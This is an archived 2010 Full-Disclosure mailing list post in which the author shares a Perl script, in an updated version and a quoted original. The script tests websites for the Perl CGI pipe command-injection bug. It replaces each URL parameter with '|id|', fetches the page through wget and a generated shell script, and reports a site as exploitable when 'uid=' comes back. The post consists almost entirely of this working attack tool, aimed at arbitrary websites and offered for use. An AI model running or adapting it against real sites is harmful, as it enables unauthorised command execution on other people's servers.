lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [<thread-prev] [day] [month] [year] [list] 
Date: Mon, 21 Jun 2010 22:34:10 -0400
From: Marshall Whittaker <marshallwhittaker@...il.com>
To: full-disclosure@...ts.grok.org.uk
Subject: Re: (Almost) Universal perl CGI exploitation

This has a small bug.  Gives false positives on some websites, silly me.
 Here's an updated version:

--- code ---

#!/usr/bin/perl

#oxagast

if (@ARGV[0] eq "") {
        print "             ---===  oxagast's buggy cgi finder ===---\n\n";
        print "Please provide a URL with a CGI script and it's args.\n";
        print "ex.  $0
\"http://www.example.com/cgi-bin/buggy.cgi?file_name=whateverfile.txt&click_num=0&hello=world\
<http://www.example.com/cgi-bin/buggy.cgi?file_name=whateverfile.txt&click_num=0&hello=world%5C>"\n";
        exit;
}


@urlquestionsplit = split(/\?/, @ARGV[0]);
$baseurl = @urlquestionsplit[0];
@inputafterquestion = split(/\&/, @urlquestionsplit[1]);

for $countargs (0..scalar(@inputafterquestion)) {
        $numofargs = $countargs;
}


for $cgiargsplitter (0..$numofargs) {
        @cgiaanda = split(/=/, @inputafterquestion[$cgiargsplitter]);
        push @cgiargsaftereq, @cgiaanda[1];
}
for $thisarg (0..$numofargs-1) {
        $wholestring = @urlquestionsplit[1];
        $wholestring =~ s/@...argsaftereq[$thisarg]/\|id|/;
        push @urltotest, "$baseurl?$wholestring";
}


for $argnumber (0..$numofargs) {
system("echo \"wget -q -O gettmp \'@...totest[$argnumber]\'\" > getfile.sh");
system("chmod u+x getfile.sh");
system("./getfile.sh");
@gotstuff = `cat gettmp`;
$done = 0;
$exploitable;
for $line (0..scalar(@gotstuff)-1) {
        if (@gotstuff[$line] =~ m/uid\=/) {
                if ($done == 0) {
                        $done = 1;
                        $firstline = $line;
                        @gotstuff[$line] =~ m/.*uid(.*)\).*/;
                        $uidline = "uid$1)";
                        print "Exploitable...\n";
                        print "@urltotest[$argnumber]\n";
                        print "$uidline\n";
                        unlink(gettemp);
                        unlink(getfile.sh);
                        $exploitable = 1;
                }
        }
}
system("rm gettmp getfile.sh");
}
if ($exploitable == 0) {
        print "Sorry, not exploitable...\n";
}


--- code ---



On Sun, Jun 20, 2010 at 11:43 PM, Marshall Whittaker <
marshallwhittaker@...il.com> wrote:

> This works on the perl pipe bug.  It'll take an arg that's the address of a
> website and it's cgi script with some args to the script then figure out if
> it can exploit it and how.  It's worked on everything I've tried it on,
> though I have limited test boxes.  It's pretty dirty but it works.
>
> #!/usr/bin/perl
>
> #oxagast
>
> if (@ARGV[0] eq "") {
>         print "             ---===  oxagast's buggy cgi finder ===---\n\n";
>         print "Please provide a URL with a CGI script and it's args.\n";
>         print "ex.  $0 \"http://www.example.com/cgi-bin/buggy.cgi?file_name=whateverfile.txt&click_num=0&hello=world\ <http://www.example.com/cgi-bin/buggy.cgi?file_name=whateverfile.txt&click_num=0&hello=world%5C>"\n";
>         exit;
> }
>
>
> @urlquestionsplit = split(/\?/, @ARGV[0]);
> $baseurl = @urlquestionsplit[0];
> @inputafterquestion = split(/\&/, @urlquestionsplit[1]);
>
> for $countargs (0..scalar(@inputafterquestion)) {
>         $numofargs = $countargs;
> }
>
>
> for $cgiargsplitter (0..$numofargs) {
>         @cgiaanda = split(/=/, @inputafterquestion[$cgiargsplitter]);
>         push @cgiargsaftereq, @cgiaanda[1];
> }
> for $thisarg (0..$numofargs-1) {
>         $wholestring = @urlquestionsplit[1];
>         $wholestring =~ s/@...argsaftereq[$thisarg]/\|id|/;
>         push @urltotest, "$baseurl?$wholestring";
> }
>
>
> for $argnumber (0..$numofargs) {
> system("echo \"wget -q -O gettmp \'@...totest[$argnumber]\'\" > getfile.sh");
> system("chmod u+x getfile.sh");
> system("./getfile.sh");
> @gotstuff = `cat gettmp`;
> $done = 0;
> $exploitable;
> for $line (0..scalar(@gotstuff)-1) {
>         if (@gotstuff[$line] =~ m/uid/) {
>                 if ($done == 0) {
>                         $done = 1;
>                         $firstline = $line;
>                         @gotstuff[$line] =~ m/.*uid(.*)\).*/;
>                         $uidline = "uid$1)";
>                         print "Exploitable...\n";
>                         print "@urltotest[$argnumber]\n";
>                         print "$uidline\n";
>                         unlink(gettemp);
>                         unlink(getfile.sh);
>                         $exploitable = 1;
>                 }
>         }
> }
> system("rm gettmp getfile.sh");
> }
> if ($exploitable == 0) {
>         print "Sorry, not exploitable...\n";
> }
>
>

Content of type "text/html" skipped

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ